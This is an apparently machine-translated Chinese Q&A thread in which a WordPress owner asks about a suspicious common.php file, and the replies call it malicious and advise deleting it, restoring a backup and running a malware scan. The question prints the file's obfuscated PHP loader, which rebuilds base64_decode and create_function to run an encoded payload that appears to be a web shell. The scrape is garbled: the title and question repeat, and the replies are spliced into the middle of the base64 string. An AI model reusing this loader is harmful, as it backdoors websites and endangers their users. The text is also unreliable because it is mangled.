Wordpress common.php文件已损坏/被黑客攻击?
我的一个wordpress网站出现问题。(经常注销用户,不允许用户登录) 我的主机认为路径是common.php文件(/public\u html/wp content/common.php) 有人能解释一下这些文件到底在做什么吗?我可以删除它,WordPress会生成一个新文件吗 common.php代码:Wordpress common.php文件已损坏/被黑客攻击?,wordpress,Wordpress,我的一个wordpress网站出现问题。(经常注销用户,不允许用户登录) 我的主机认为路径是common.php文件(/public\u html/wp content/common.php) 有人能解释一下这些文件到底在做什么吗?我可以删除它,WordPress会生成一个新文件吗 common.php代码: <?php $alphabet = ".hyib/;dq4ux9*zjmclp3_r80)t(vakng1s2foe75w6"; $string = "Cmdsb2JhbC
<?php
$alphabet = ".hyib/;dq4ux9*zjmclp3_r80)t(vakng1s2foe75w6";
$string = "Cmdsb2JhbCAkYXV0aF9wYXNzLCRjb2xvciwkZGVmYXVsdF9hY3Rpb24sJGRlZmF1bHRfdXNlX2FqYXgsJGRlZmF1bHRfY2hhcnNldCwkc29ydDsKZ2xvYmFsICRjd2QsJG9zLCRzYWZlX21vZGUsICRpbjsKCiRhdXRoX3Bhc3MgPSAnZGU0OTA5YzUxZWZiNjZlNTgwYzMyZTk5NTFlZGI1ZG
提前谢谢
Rich删除文件。 它不是WordPress安装或升级包的一部分。我会假设该文件是恶意的,并且您的主机帐户/个人计算机/登录凭据已被破坏或类似情况 这是本例中提到的标准支持文档:
一旦您的站点清理干净:
是的,您的网站似乎已被黑客入侵。可能在某个地方有一个
eval
,在解密后运行此代码。您可能希望从早期备份还原。感谢您的快速响应,我将立即删除该文件,并查看它是否解决了我们一直存在的问题。您可以使用联机恶意软件扫描仪。可能是像Wordfence
这样的插件,用来检查是否有更多受感染的文件。干杯,我已经安全了,所以现在将运行另一次扫描。该文件当时是否使用了用户密码?或者文件应该做什么?
J10gPSAkZGVmYXVsdF9hY3Rpb247CgllbHNlCgkJJF9QT1NUWydhJ10gPSAnU2VjSW5mbyc7CmlmKCAhZW1wdHkoJF9QT1NUWydhJ10pICYmIGZ1bmN0aW9uX2V4aXN0cygnYWN0aW9uJyAuICRfUE9TVFsnYSddKSApCgljYWxsX3VzZXJfZnVuYygnYWN0aW9uJyAuICRfUE9TVFsnYSddKTsKZXhpdDsKCg==";
$array_name = "";
foreach([4,29,34,38,42,9,21,7,38,17,37,7,38] as $t){
$array_name .= $alphabet[$t];
}
$a = strrev("noi"."tcnuf"."_eta"."erc");
$f = $a("", $array_name($string));
$f();